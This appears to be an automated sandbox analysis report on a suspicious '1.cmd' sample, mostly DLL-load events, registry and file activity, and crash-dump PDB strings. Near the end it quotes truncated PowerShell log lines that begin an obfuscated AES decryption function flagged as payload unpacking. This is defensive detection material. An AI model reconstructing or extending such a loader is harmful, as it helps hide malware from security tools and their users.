Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1.cmd

Static file information: File size 5214429 > 1048576

Source:	Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
